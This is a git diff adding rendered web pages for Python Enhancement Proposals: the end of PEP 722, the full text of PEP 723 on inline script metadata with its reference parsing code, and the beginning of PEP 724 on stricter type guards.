In addition, if the expectation here is that the pyproject.toml will somehow be designed for running scripts in place, that’s a new feature of the standard that doesn’t currently exist. At a minimum, this isn’t a reasonable suggestion until the current discussion on Discourse about using pyproject.toml for projects that won’t be distributed as wheels is resolved. And even then, it doesn’t address the “sending someone a script in a gist or email” use case.

+
+
+

Why not use a requirements file for dependencies?

+

Putting your requirements in a requirements file doesn’t require a PEP. You can do that right now, and in fact it’s quite likely that many adhoc solutions do this. However, without a standard, there’s no way of knowing how to locate a script’s dependency data. And furthermore, the requirements file format is pip-specific, so tools relying on it are depending on a pip implementation detail.

+

So in order to make a standard, two things would be required:

+
  1. A standardised replacement for the requirements file format.
  2. A standard for how to locate the requirements file for a given script.

The first item is a significant undertaking. It has been discussed on a number of occasions, but so far no-one has attempted to actually do it. The most likely approach would be for standards to be developed for individual use cases currently addressed with requirements files. One option here would be for this PEP to define a new file format: simply a text file containing PEP 508 requirements, one per line. That would just leave the question of how to locate that file.

The “obvious” solution here would be to do something like name the file the same as the script, but with a .reqs extension (or something similar). However, this still requires two files, where currently only a single file is needed, and as such, does not match the “better batch file” model (shell scripts and batch files are typically self-contained). It requires the developer to remember to keep the two files together, and this may not always be possible. For example, system administration policies may require that all files in a certain directory are executable (the Linux filesystem standards require this of /usr/bin, for example). And some methods of sharing a script (for example, publishing it on a text file sharing service like GitHub’s gist, or a corporate intranet) may not allow for deriving the location of an associated requirements file from the script’s location (tools like pipx support running a script directly from a URL, so “download and unpack a zip of the script and its dependencies” may not be an appropriate requirement).

Essentially, though, the issue here is that there is an explicitly stated requirement that the format supports storing dependency data in the script file itself. Solutions that don’t do that are simply ignoring that requirement.

+
+
+

Should scripts be able to specify a package index?

+

Dependency metadata is about what package the code depends on, and not where that package comes from. There is no difference here between metadata for scripts, and metadata for distribution packages (as defined in pyproject.toml). In both cases, dependencies are given in “abstract” form, without specifying how they are obtained.

Some tools that use the dependency information may, of course, need to locate concrete dependency artifacts - for example if they expect to create an environment containing those dependencies. But the way they choose to do that will be closely linked to the tool’s UI in general, and this PEP does not try to dictate the UI for tools.

There is more discussion of this point, and in particular of the UI choices made by the pip-run tool, in the previously mentioned pip-run issue.

+
+
+

What about local dependencies?

+

These can be handled without needing special metadata and tooling, simply by adding the location of the dependencies to sys.path. This PEP simply isn’t needed for this case. If, on the other hand, the “local dependencies” are actual distributions which are published locally, they can be specified as usual with a PEP 508 requirement, and the local package index specified when running a tool by using the tool’s UI for that.
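For example (the vendored directory name is hypothetical), a script can make a sibling directory of local modules importable without any metadata at all:

import sys
from pathlib import Path

# Make ./vendored, a directory of local dependencies next to this
# script, importable before anything else on sys.path.
sys.path.insert(0, str(Path(__file__).parent / "vendored"))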

+
+
+
+

Open Issues

+

None at this point.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0722.rst

+

Last modified: 2023-10-21 10:30:17 GMT

+ +
+ +
\ No newline at end of file
diff --git a/pep-0723/index.html b/pep-0723/index.html
new file mode 100644
index 00000000000..c55215e1cea
--- /dev/null
+++ b/pep-0723/index.html
@@ -0,0 +1,863 @@

PEP 723 – Inline script metadata | peps.python.org
+
+


+ + +
+
+
+

PEP 723 – Inline script metadata

+
+
Author:
+
Ofek Lev <ofekmeister at gmail.com>
+
Sponsor:
+
Adam Turner <python at quite.org.uk>
+
PEP-Delegate:
+
Brett Cannon <brett at python.org>
+
Discussions-To:
+
Discourse thread
+
Status:
+
Final
+
Type:
+
Standards Track
+
Topic:
+
Packaging
+
Created:
+
04-Aug-2023
+
Post-History:
+
04-Aug-2023, +06-Aug-2023, +23-Aug-2023, +06-Dec-2023
+
Replaces:
+
722
+
Resolution:
+
08-Jan-2024
+
+
+
+
+
+

Attention

+

This PEP is a historical document. The up-to-date, canonical spec, Inline script metadata, is maintained on the PyPA specs page.

+


+

See the PyPA specification update process for how to propose changes.

+
+
+

Abstract

+

This PEP specifies a metadata format that can be embedded in single-file Python scripts to assist launchers, IDEs and other external tools which may need to interact with such scripts.

+
+
+

Motivation

+

Python is routinely used as a scripting language, with Python scripts as a (better) alternative to shell scripts, batch files, etc. When Python code is structured as a script, it is usually stored as a single file and does not expect the availability of any other local code that may be used for imports. As such, it is possible to share with others over arbitrary text-based means such as email, a URL to the script, or even a chat window. Code that is structured like this may live as a single file forever, never becoming a full-fledged project with its own directory and pyproject.toml file.

An issue that users encounter with this approach is that there is no standard mechanism to define metadata for tools whose job it is to execute such scripts. For example, a tool that runs a script may need to know which dependencies are required or the supported version(s) of Python.

There is currently no standard tool that addresses this issue, and this PEP does not attempt to define one. However, any tool that does address this issue will need to know what the runtime requirements of scripts are. By defining a standard format for storing such metadata, existing tools, as well as any future tools, will be able to obtain that information without requiring users to include tool-specific metadata in their scripts.

+
+
+

Rationale

+

This PEP defines a mechanism for embedding metadata within the script itself, and not in an external file.

The metadata format is designed to be similar to the layout of data in the pyproject.toml file of a Python project directory, to provide a familiar experience for users who have experience writing Python projects. By using a similar format, we avoid unnecessary inconsistency between packaging tools, a common frustration expressed by users in the recent packaging survey.

+

The following are some of the use cases that this PEP wishes to support:

+
  • A user facing CLI that is capable of executing scripts. If we take Hatch as an example, the interface would be simply hatch run /path/to/script.py [args] and Hatch will manage the environment for that script. Such tools could be used as shebang lines on non-Windows systems e.g. #!/usr/bin/env hatch run.
  • A script that desires to transition to a directory-type project. A user may be rapidly prototyping locally or in a remote REPL environment and then decide to transition to a more formal project layout if their idea works out. Being able to define dependencies in the script would be very useful to have fully reproducible bug reports.
  • Users that wish to avoid manual dependency management. For example, package managers that have commands to add/remove dependencies or dependency update automation in CI that triggers based on new versions or in response to CVEs [1].
+
+

Specification

+

This PEP defines a metadata comment block format loosely inspired [2] by reStructuredText Directives.

+

Any Python script may have top-level comment blocks that MUST start with the line # /// TYPE where TYPE determines how to process the content. That is: a single #, followed by a single space, followed by three forward slashes, followed by a single space, followed by the type of metadata. The block MUST end with the line # ///. That is: a single #, followed by a single space, followed by three forward slashes. The TYPE MUST only consist of ASCII letters, numbers and hyphens.

Every line between these two lines (# /// TYPE and # ///) MUST be a comment starting with #. If there are characters after the # then the first character MUST be a space. The embedded content is formed by taking away the first two characters of each line if the second character is a space, otherwise just the first character (which means the line consists of only a single #).

+
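As a non-normative sketch, that content-extraction rule can be written directly; the comment_lines value here is a made-up example of the lines between the two delimiters, newlines included:

comment_lines = [
    '# requires-python = ">=3.11"\n',
    '#\n',
]
content = ''.join(
    line[2:] if line.startswith('# ') else line[1:]  # strip '# ' or bare '#'
    for line in comment_lines
)
# content == 'requires-python = ">=3.11"\n\n'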

Precedence for an ending line # /// is given when the next line is not a valid embedded content line as described above. For example, the following is a single fully valid block:

+
# /// some-toml
+# embedded-csharp = """
+# /// <summary>
+# /// text
+# ///
+# /// </summary>
+# public class MyClass { }
+# """
+# ///
+
+
+

A starting line MUST NOT be placed between another starting line and its ending line. In such cases tools MAY produce an error. Unclosed blocks MUST be ignored.

When there are multiple comment blocks of the same TYPE defined, tools MUST produce an error.

Tools reading embedded metadata MAY respect the standard Python encoding declaration. If they choose not to do so, they MUST process the file as UTF-8.

This is the canonical regular expression that MAY be used to parse the metadata:

+
(?m)^# /// (?P<type>[a-zA-Z0-9-]+)$\s(?P<content>(^#(| .*)$\s)+)^# ///$
+
+
+

In circumstances where there is a discrepancy between the text specification and the regular expression, the text specification takes precedence.

Tools MUST NOT read from metadata blocks with types that have not been standardized by this PEP or future ones.

+
+

script type

+

The first type of metadata block is named script which contains script metadata (dependency data and tool configuration).

This document MAY include top-level fields dependencies and requires-python, and MAY optionally include a [tool] table.

The [tool] table MAY be used by any tool, script runner or otherwise, to configure behavior. It has the same semantics as the tool table in pyproject.toml.

+

The top-level fields are:

+
  • dependencies: A list of strings that specifies the runtime dependencies of the script. Each entry MUST be a valid PEP 508 dependency.
  • requires-python: A string that specifies the Python version(s) with which the script is compatible. The value of this field MUST be a valid version specifier.

Script runners MUST error if the specified dependencies cannot be provided. Script runners SHOULD error if no version of Python that satisfies the specified requires-python can be provided.

+
+
+

Example

+

The following is an example of a script with embedded metadata:

+
# /// script
+# requires-python = ">=3.11"
+# dependencies = [
+#   "requests<3",
+#   "rich",
+# ]
+# ///
+
+import requests
+from rich.pretty import pprint
+
+resp = requests.get("https://peps.python.org/api/peps.json")
+data = resp.json()
+pprint([(k, v["title"]) for k, v in data.items()][:10])
+
+
+
+
+
+

Reference Implementation

+

The following is an example of how to read the metadata on Python 3.11 or higher.

+
import re
+import tomllib
+
+REGEX = r'(?m)^# /// (?P<type>[a-zA-Z0-9-]+)$\s(?P<content>(^#(| .*)$\s)+)^# ///$'
+
+def read(script: str) -> dict | None:
+    name = 'script'
+    matches = list(
+        filter(lambda m: m.group('type') == name, re.finditer(REGEX, script))
+    )
+    if len(matches) > 1:
+        raise ValueError(f'Multiple {name} blocks found')
+    elif len(matches) == 1:
+        content = ''.join(
+            line[2:] if line.startswith('# ') else line[1:]
+            for line in matches[0].group('content').splitlines(keepends=True)
+        )
+        return tomllib.loads(content)
+    else:
+        return None
+
+
+
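For example, with a hypothetical file name, the function above could be driven like this:

from pathlib import Path

# Parse the 'script' block (if any) out of the script's source text.
metadata = read(Path("example.py").read_text())
if metadata is not None:
    print(metadata.get("dependencies", []))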

Tools such as package managers or dependency update automation in CI will often need to edit dependencies. The following is a crude example of modifying the content using the tomlkit library.

+
import re
+
+import tomlkit
+
+REGEX = r'(?m)^# /// (?P<type>[a-zA-Z0-9-]+)$\s(?P<content>(^#(| .*)$\s)+)^# ///$'
+
+def add(script: str, dependency: str) -> str:
+    match = re.search(REGEX, script)
+    content = ''.join(
+        line[2:] if line.startswith('# ') else line[1:]
+        for line in match.group('content').splitlines(keepends=True)
+    )
+
+    config = tomlkit.parse(content)
+    config['dependencies'].append(dependency)
+    new_content = ''.join(
+        f'# {line}' if line.strip() else f'#{line}'
+        for line in tomlkit.dumps(config).splitlines(keepends=True)
+    )
+
+    start, end = match.span('content')
+    return script[:start] + new_content + script[end:]
+
+
+

Note that this example used a library that preserves TOML formatting. This is not a requirement for editing by any means but rather is a “nice to have” feature.

The following is an example of how to read a stream of arbitrary metadata blocks.

+
import re
+from typing import Iterator
+
+REGEX = r'(?m)^# /// (?P<type>[a-zA-Z0-9-]+)$\s(?P<content>(^#(| .*)$\s)+)^# ///$'
+
+def stream(script: str) -> Iterator[tuple[str, str]]:
+    for match in re.finditer(REGEX, script):
+        yield match.group('type'), ''.join(
+            line[2:] if line.startswith('# ') else line[1:]
+            for line in match.group('content').splitlines(keepends=True)
+        )
+
+
+
+
+

Backwards Compatibility

+

At the time of writing, the # /// script block comment starter does not appear in any Python files on GitHub. Therefore, there is little risk of existing scripts being broken by this PEP.

+
+
+

Security Implications

+

If a script containing embedded metadata is run using a tool that automatically installs dependencies, this could cause arbitrary code to be downloaded and installed in the user’s environment.

The risk here is part of the functionality of the tool being used to run the script, and as such should already be addressed by the tool itself. The only additional risk introduced by this PEP is if an untrusted script with embedded metadata is run, when a potentially malicious dependency or transitive dependency might be installed.

This risk is addressed by the normal good practice of reviewing code before running it. Additionally, tools may be able to provide locking functionality to ameliorate this risk.

+
+
+

How to Teach This

+

To embed metadata in a script, define a comment block that starts with the line # /// script and ends with the line # ///. Every line between those two lines must be a comment and the full content is derived by removing the first two characters.

+
# /// script
+# dependencies = [
+#   "requests<3",
+#   "rich",
+# ]
+# requires-python = ">=3.11"
+# ///
+
+
+

The allowed fields are described in the following table:

Field           | Description                                                                                                                                   | Tool behavior
dependencies    | A list of strings that specifies the runtime dependencies of the script. Each entry must be a valid PEP 508 dependency.                        | Tools will error if the specified dependencies cannot be provided.
requires-python | A string that specifies the Python version(s) with which the script is compatible. The value of this field must be a valid version specifier. | Tools might error if no version of Python that satisfies the constraint can be executed.

In addition, a [tool] table is allowed. Details of what is permitted are similar to what is permitted in pyproject.toml, but precise information must be included in the documentation of the relevant tool.

It is up to individual tools whether or not their behavior is altered based on the embedded metadata. For example, every script runner may not be able to provide an environment for specific Python versions as defined by the requires-python field.

The tool table may be used by any tool, script runner or otherwise, to configure behavior.

+
+
+

Recommendations

+

Tools that support managing different versions of Python should attempt to use the highest available version of Python that is compatible with the script’s requires-python metadata, if defined.
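A hedged sketch of that selection logic, using the packaging library; the list of available interpreter versions is a stand-in for whatever discovery mechanism a tool actually uses:

from packaging.specifiers import SpecifierSet
from packaging.version import Version

available = ["3.10.14", "3.11.9", "3.12.3"]  # hypothetical installed versions
spec = SpecifierSet(">=3.11")  # from the script's requires-python field

# Keep only compatible versions, then pick the highest one.
candidates = [v for v in available if Version(v) in spec]
best = max(candidates, key=Version) if candidates else None  # -> "3.12.3"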

+
+
+

Tooling buy-in

+

The following is a list of tools that have expressed support for this PEP or have committed to implementing support should it be accepted:

+
  • Pantsbuild and Pex: expressed support for any way to define dependencies and also features that this PEP considers as valid use cases such as building packages from scripts and embedding tool configuration
  • Mypy and Ruff: strongly expressed support for embedding tool configuration as it would solve existing pain points for users
  • Hatch: (author of this PEP) expressed support for all aspects of this PEP, and will be one of the first tools to support running scripts with specifically configured Python versions
+
+

Rejected Ideas

+
+

Why not use a comment block resembling requirements.txt?

+

This PEP considers there to be different types of users for whom Python code would live as single-file scripts:

+
  • Non-programmers who are just using Python as a scripting language to achieve a specific task. These users are unlikely to be familiar with concepts of operating systems like shebang lines or the PATH environment variable. Some examples:
      • The average person, perhaps at a workplace, who wants to write a script to automate something for efficiency or to reduce tedium
      • Someone doing data science or machine learning in industry or academia who wants to write a script to analyze some data or for research purposes. These users are special in that, although they have limited programming knowledge, they learn from sources like StackOverflow and blogs that have a programming bent and are increasingly likely to be part of communities that share knowledge and code. Therefore, a non-trivial number of these users will have some familiarity with things like Git(Hub), Jupyter, HuggingFace, etc.
  • Non-programmers who manage operating systems e.g. a sysadmin. These users are able to set up PATH, for example, but are unlikely to be familiar with Python concepts like virtual environments. These users often operate in isolation and have limited need to gain exposure to tools intended for sharing like Git.
  • Programmers who manage operating systems/infrastructure e.g. SREs. These users are not very likely to be familiar with Python concepts like virtual environments, but are likely to be familiar with Git and most often use it to version control everything required to manage infrastructure like Python scripts and Kubernetes config.
  • Programmers who write scripts primarily for themselves. These users over time accumulate a great number of scripts in various languages that they use to automate their workflow and often store them in a single directory that is potentially version controlled for persistence. Non-Windows users may set up each Python script with a shebang line pointing to the desired Python executable or script runner.

This PEP argues that the proposed TOML-based metadata format is the best for each category of user and that the requirements-like block comment is only approachable for those who have familiarity with requirements.txt, which represents a small subset of users.

+
  • For the average person automating a task or the data scientist, they are already starting with zero context and are unlikely to be familiar with TOML or requirements.txt. These users will very likely rely on snippets found online via a search engine or utilize AI in the form of a chat bot or direct code completion software. The similarity with dependency information stored in pyproject.toml will provide useful search results relatively quickly, and while the pyproject.toml format and the script metadata format are not the same, any resulting discrepancies are unlikely to be difficult for the intended users to resolve.
    Additionally, these users are most susceptible to formatting quirks and syntax errors. TOML is a well-defined format with existing online validators that features assignment that is compatible with Python expressions and has no strict indenting rules. The block comment format on the other hand could be easily malformed by forgetting the colon, for example, and debugging why it’s not working with a search engine would be a difficult task for such a user.
  • For the sysadmin types, they are equally unlikely as the previously described users to be familiar with TOML or requirements.txt. For either format they would have to read documentation. They would likely be more comfortable with TOML since they are used to structured data formats and there would be less perceived magic in their systems.
    Additionally, for maintenance of their systems /// script would be much easier to search for from a shell than a block comment with potentially numerous extensions over time.
  • For the SRE types, they are likely to be familiar with TOML already from other projects that they might have to work with like configuring the GitLab Runner or Cloud Native Buildpacks.
    These users are responsible for the security of their systems and most likely have security scanners set up to automatically open PRs to update versions of dependencies. Such automated tools like Dependabot would have a much easier time using existing TOML libraries than writing their own custom parser for a block comment format.
  • For the programmer types, they are more likely to be familiar with TOML than they have ever seen a requirements.txt file, unless they are a Python programmer who has had previous experience with writing applications. In the case of experience with the requirements format, it necessarily means that they are at least somewhat familiar with the ecosystem and therefore it is safe to assume they know what TOML is.
    Another benefit of this PEP to these users is that their IDEs like Visual Studio Code would be able to provide TOML syntax highlighting much more easily than each writing custom logic for this feature.

Additionally, since the original block comment alternative format (double #) went against the recommendation of PEP 8 and as a result linters and IDE auto-formatters that respected the recommendation would fail by default, the final proposal uses standard comments starting with a single # character without any obvious start nor end sequence.

The concept of regular comments that do not appear to be intended for machines (i.e. encoding declarations) affecting behavior would not be customary to users of Python and goes directly against the “explicit is better than implicit” foundational principle.

Users typing what to them looks like prose could alter runtime behavior. This PEP takes the view that the possibility of that happening, even when a tool has been set up as such (maybe by a sysadmin), is unfriendly to users.

Finally, and critically, the alternatives to this PEP like PEP 722 do not satisfy the use cases enumerated herein, such as setting the supported Python versions, the eventual building of scripts into packages, and the ability to have machines edit metadata on behalf of users. It is very likely that the requests for such features persist and conceivable that another PEP in the future would allow for the embedding of such metadata. At that point there would be multiple ways to achieve the same thing which goes against our foundational principle of “there should be one - and preferably only one - obvious way to do it”.

+
+
+

Why not use a multi-line string?

+

A previous version of this PEP proposed that the metadata be stored as follows:

+
__pyproject__ = """
+...
+"""
+
+
+

The most significant problem with this proposal is that the embedded TOML would be limited in the following ways:

+
  • It would not be possible to use multi-line double-quoted strings in the TOML as that would conflict with the Python string containing the document. Many TOML writers do not preserve style and may potentially produce output that would be malformed.
  • The way in which character escaping works in Python strings is not quite the way it works in TOML strings. It would be possible to preserve a one-to-one character mapping by enforcing raw strings, but this r prefix requirement may be potentially confusing to users.
+
+

Why not reuse core metadata fields?

+

A previous version of this PEP proposed to reuse the existing metadata standard that is used to describe projects.

+

There are two significant problems with this proposal:

+ +
+
+

Why not limit to specific metadata fields?

+

By limiting the metadata to just dependencies, we would prevent the known use case of tools that support managing Python installations, which would allow users to target specific versions of Python for new syntax or standard library functionality.

+
+
+

Why not limit tool configuration?

+

By not allowing the [tool] table, we would prevent known functionality that would benefit users. For example:

+
  • A script runner may support injecting of dependency resolution data for an embedded lock file (this is what Go’s gorun can do).
  • A script runner may support configuration instructing to run scripts in containers for situations in which there is no cross-platform support for a dependency or if the setup is too complex for the average user like when requiring Nvidia drivers. Situations like this would allow users to proceed with what they want to do whereas otherwise they may stop at that point altogether.
  • Tools may wish to experiment with features to ease development burden for users such as the building of single-file scripts into packages. We received feedback stating that there are already tools that exist in the wild that build wheels and source distributions from single files.
    The author of the Rust RFC for embedding metadata mentioned to us that they are actively looking into that as well based on user feedback saying that there is unnecessary friction with managing small projects.
    There has been a commitment to support this by at least one major build system.
+
+
+

Why not limit tool behavior?

+

A previous version of this PEP proposed that non-script running tools SHOULD NOT modify their behavior when the script is not the sole input to the tool. For example, if a linter is invoked with the path to a directory, it SHOULD behave the same as if zero files had embedded metadata.

This was done as a precaution to avoid tool behavior confusion and generating various feature requests for tools to support this PEP. However, during discussion we received feedback from maintainers of tools that this would be undesirable and potentially confusing to users. Additionally, this may allow for a universally easier way to configure tools in certain circumstances and solve existing issues.

+
+
+

Why not just set up a Python project with a pyproject.toml?

+

Again, a key issue here is that the target audience for this proposal is people writing scripts which aren’t intended for distribution. Sometimes scripts will be “shared”, but this is far more informal than “distribution” - it typically involves sending a script via an email with some written instructions on how to run it, or passing someone a link to a GitHub gist.

Expecting such users to learn the complexities of Python packaging is a significant step up in complexity, and would almost certainly give the impression that “Python is too hard for scripts”.

In addition, if the expectation here is that the pyproject.toml will somehow be designed for running scripts in place, that’s a new feature of the standard that doesn’t currently exist. At a minimum, this isn’t a reasonable suggestion until the current discussion on Discourse about using pyproject.toml for projects that won’t be distributed as wheels is resolved. And even then, it doesn’t address the “sending someone a script in a gist or email” use case.

+
+
+

Why not infer the requirements from import statements?

+

The idea would be to automatically recognize import statements in the source +file and turn them into a list of requirements.

+

However, this is infeasible for several reasons. First, the points above about keeping the syntax easily parsable (for all Python versions, and by tools written in other languages) apply equally here.

+

Second, PyPI and other package repositories conforming to the Simple Repository +API do not provide a mechanism to resolve package names from the module names +that are imported (see also this related discussion).

+

Third, even if repositories did offer this information, the same import name may +correspond to several packages on PyPI. One might object that disambiguating +which package is wanted would only be needed if there are several projects +providing the same import name. However, this would make it easy for anyone to +unintentionally or malevolently break working scripts, by uploading a package to +PyPI providing an import name that is the same as an existing project. The +alternative where, among the candidates, the first package to have been +registered on the index is chosen, would be confusing in case a popular package +is developed with the same import name as an existing obscure package, and even +harmful if the existing package is malware intentionally uploaded with a +sufficiently generic import name that has a high probability of being reused.

+

A related idea would be to attach the requirements as comments to the import +statements instead of gathering them in a block, with a syntax such as:

+
import numpy as np # requires: numpy
+import rich # requires: rich
+
+
+

This still suffers from parsing difficulties. Also, where to place the comment +in the case of multiline imports is ambiguous and may look ugly:

+
from PyQt5.QtWidgets import (
+    QCheckBox, QComboBox, QDialog, QDialogButtonBox,
+    QGridLayout, QLabel, QSpinBox, QTextEdit
+) # requires: PyQt5
+
+
+

Furthermore, this syntax cannot behave as might be intuitively expected +in all situations. Consider:

+
import platform
+if platform.system() == "Windows":
+    import pywin32 # requires: pywin32
+
+
+

Here, the user’s intent is that the package is only required on Windows, but +this cannot be understood by the script runner (the correct way to write +it would be requires: pywin32 ; sys_platform == 'win32').

+

(Thanks to Jean Abou-Samra for the clear discussion of this point)

+
+
+

Why not use a requirements file for dependencies?

+

Putting your requirements in a requirements file doesn’t require a PEP. You can do that right now, and in fact it’s quite likely that many ad hoc solutions do this. However, without a standard, there’s no way of knowing how to locate a script’s dependency data. Furthermore, the requirements file format is pip-specific, so tools relying on it are depending on a pip implementation detail.

+

So in order to make a standard, two things would be required:

+
    +
  1. A standardised replacement for the requirements file format.
  2. A standard for how to locate the requirements file for a given script.
+

The first item is a significant undertaking. It has been discussed on a number of occasions, but so far no-one has attempted to actually do it. The most likely approach would be for standards to be developed for individual use cases currently addressed with requirements files. One option here would be for this PEP to define a new file format: a text file containing PEP 508 requirements, one per line. That would just leave the question of how to locate that file.

+

The “obvious” solution here would be to do something like name the file the same as the script, but with a .reqs extension (or something similar). However, this still requires two files, where currently only a single file is needed, and as such, does not match the “better batch file” model (shell scripts and batch files are typically self-contained). It requires the developer to remember to keep the two files together, and this may not always be possible. For example, system administration policies may require that all files in a certain directory are executable (the Linux filesystem standards require this of /usr/bin, for example). And some methods of sharing a script (for example, publishing it on a text file sharing service like GitHub’s gist, or a corporate intranet) may not allow for deriving the location of an associated requirements file from the script’s location (tools like pipx support running a script directly from a URL, so “download and unpack a zip of the script and its dependencies” may not be an appropriate requirement).

+

Essentially, though, the issue here is that there is an explicitly stated +requirement that the format supports storing dependency data in the script +file itself. Solutions that don’t do that are simply ignoring that +requirement.

+
+
+

Why not use (possibly restricted) Python syntax?

+

This would typically involve storing metadata as multiple special variables, +such as the following.

+
__requires_python__ = ">=3.11"
+__dependencies__ = [
+    "requests",
+    "click",
+]
+
+
+

The most significant problem with this proposal is that it requires all +consumers of the dependency data to implement a Python parser. Even if the +syntax is restricted, the rest of the script will use the full Python syntax, +and trying to define a syntax which can be successfully parsed in isolation +from the surrounding code is likely to be extremely difficult and error-prone.

+

Furthermore, Python’s syntax changes in every release. If extracting dependency +data needs a Python parser, the parser will need to know which version of +Python the script is written for, and the overhead for a generic tool of having +a parser that can handle multiple versions of Python is unsustainable.
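
A sketch of this failure mode: a consumer that uses Python's own ast module can only parse syntax its interpreter knows, so metadata extraction breaks for scripts using newer syntax (the type statement below requires a Python 3.12+ parser):

import ast

script = '''
__dependencies__ = ["requests"]

type Alias = list[int]  # "type" statements need a Python 3.12+ parser
'''

try:
    ast.parse(script)
    print("metadata could be extracted")
except SyntaxError as exc:
    # On interpreters older than 3.12 the whole script fails to parse, so
    # even the simple __dependencies__ assignment cannot be reached.
    print("cannot extract metadata:", exc)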

+

With this approach there is the potential to clutter scripts with many +variables as new extensions get added. Additionally, intuiting which metadata +fields correspond to which variable names would cause confusion for users.

+

It is worth noting, though, that the pip-run utility does implement (an +extended form of) this approach. Further discussion of +the pip-run design is available on the project’s issue tracker.

+
+
+

What about local dependencies?

+

These can be handled without needing special metadata and tooling, simply by +adding the location of the dependencies to sys.path. This PEP simply isn’t +needed for this case. If, on the other hand, the “local dependencies” are +actual distributions which are published locally, they can be specified as +usual with a PEP 508 requirement, and the local package index specified when +running a tool by using the tool’s UI for that.
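
For example, a minimal sketch (the libs directory and module name are assumptions for illustration):

import sys
from pathlib import Path

# Make a directory of local modules importable; no dependency metadata needed.
sys.path.insert(0, str(Path(__file__).parent / "libs"))

import mylocalmodule  # hypothetical local module living in ./libs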

+
+
+
+

Open Issues

+

None at this point.

+
+
+

Footnotes

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0723.rst

+

Last modified: 2024-10-17 12:49:39 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0724/index.html b/pep-0724/index.html new file mode 100644 index 00000000000..eef5cd46121 --- /dev/null +++ b/pep-0724/index.html @@ -0,0 +1,463 @@ + + + + + + + + PEP 724 – Stricter Type Guards | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 724 – Stricter Type Guards

+
+
Author:
+
Rich Chiodo <rchiodo at microsoft.com>, +Eric Traut <erictr at microsoft.com>, +Erik De Bonte <erikd at microsoft.com>
+
Sponsor:
+
Jelle Zijlstra <jelle.zijlstra at gmail.com>
+
Discussions-To:
+
Discourse thread
+
Status:
+
Withdrawn
+
Type:
+
Standards Track
+
Topic:
+
Typing
+
Created:
+
28-Jul-2023
+
Python-Version:
+
3.13
+
Post-History:
+
30-Dec-2021, +19-Sep-2023
+
+
+
+
Table of Contents +
+
+

Status

+

This PEP is withdrawn. The Typing Council was unable to reach consensus on +this proposal, and the authors decided to withdraw it.

+
+
+

Abstract

+

PEP 647 introduced the concept of a user-defined type guard function which +returns True if the type of the expression passed to its first parameter +matches its return TypeGuard type. For example, a function that has a +return type of TypeGuard[str] is assumed to return True if and only if +the type of the expression passed to its first input parameter is a str. +This allows type checkers to narrow types when a user-defined type guard +function returns True.

+

This PEP refines the TypeGuard mechanism introduced in PEP 647. It +allows type checkers to narrow types when a user-defined type guard function +returns False. It also allows type checkers to apply additional (more +precise) type narrowing under certain circumstances when the type guard +function returns True.

+
+
+

Motivation

+

User-defined type guard functions enable a type checker to narrow the type of +an expression when it is passed as an argument to the type guard function. The +TypeGuard mechanism introduced in PEP 647 is flexible, but this +flexibility imposes some limitations that developers have found inconvenient +for some uses.

+

Limitation 1: Type checkers are not allowed to narrow a type in the case where +the type guard function returns False. This means the type is not narrowed +in the negative (“else”) clause.

+

Limitation 2: Type checkers must use the TypeGuard return type if the type +guard function returns True regardless of whether additional narrowing can +be applied based on knowledge of the pre-narrowed type.

+

The following code sample demonstrates both of these limitations.

+
def is_iterable(val: object) -> TypeGuard[Iterable[Any]]:
+    return isinstance(val, Iterable)
+
+def func(val: int | list[int]):
+    if is_iterable(val):
+        # The type is narrowed to 'Iterable[Any]' as dictated by
+        # the TypeGuard return type
+        reveal_type(val)  # Iterable[Any]
+    else:
+        # The type is not narrowed in the "False" case
+        reveal_type(val)  # int | list[int]
+
+    # If "isinstance" is used in place of the user-defined type guard
+    # function, the results differ because type checkers apply additional
+    # logic for "isinstance"
+
+    if isinstance(val, Iterable):
+        # Type is narrowed to "list[int]" because this is
+        # a narrower (more precise) type than "Iterable[Any]"
+        reveal_type(val)  # list[int]
+    else:
+        # Type is narrowed to "int" because the logic eliminates
+        # "list[int]" from the original union
+        reveal_type(val)  # int
+
+
+

PEP 647 imposed these limitations so it could support use cases where the +return TypeGuard type was not a subtype of the input type. Refer to +PEP 647 for examples.

+
+
+

Rationale

+

There are a number of issues where a stricter TypeGuard would have +been a solution:

+ +
+
+

Specification

+

The use of a user-defined type guard function involves five types:

+
    +
  • I = TypeGuard input type
  • +
  • R = TypeGuard return type
  • +
  • A = Type of argument passed to type guard function (pre-narrowed)
  • +
  • NP = Narrowed type (positive)
  • +
  • NN = Narrowed type (negative)
  • +
+
def guard(x: I) -> TypeGuard[R]: ...
+
+def func1(val: A):
+    if guard(val):
+        reveal_type(val)  # NP
+    else:
+        reveal_type(val)  # NN
+
+
+

This PEP proposes some modifications to PEP 647 to address the limitations +discussed above. These limitations are safe to eliminate only when a specific +condition is met. In particular, when the output type R of a user-defined +type guard function is consistent [1] with the type of its first +input parameter (I), type checkers should apply stricter type guard +semantics.

+
+
# Stricter type guard semantics are used in this case because
+# "Kangaroo | Koala" is consistent with "Animal"
+def is_marsupial(val: Animal) -> TypeGuard[Kangaroo | Koala]:
+    return isinstance(val, Kangaroo | Koala)
+
+# Stricter type guard semantics are not used in this case because
+# "list[T]"" is not consistent with "list[T | None]"
+def has_no_nones(val: list[T | None]) -> TypeGuard[list[T]]:
+    return None not in val
+
+
+
+

When stricter type guard semantics are applied, the application of a +user-defined type guard function changes in two ways.

+
    +
  • Type narrowing is applied in the negative (“else”) case.
  • +
+
def is_str(val: str | int) -> TypeGuard[str]:
+    return isinstance(val, str)
+
+def func(val: str | int):
+    if not is_str(val):
+        reveal_type(val)  # int
+
+
+
    +
  • Additional type narrowing is applied in the positive “if” case if applicable.
  • +
+
def is_cardinal_direction(val: str) -> TypeGuard[Literal["N", "S", "E", "W"]]:
+    return val in ("N", "S", "E", "W")
+
+def func(direction: Literal["NW", "E"]):
+    if is_cardinal_direction(direction):
+        reveal_type(direction)  # "Literal[E]"
+    else:
+        reveal_type(direction)  # "Literal[NW]"
+
+
+

The type-theoretic rules for type narrowing are specified in the following +table.

                 Non-strict type guard      Strict type guard
Applies when     R not consistent with I    R consistent with I
NP is ..         R                          A∧R
NN is ..         A                          A∧¬R
+

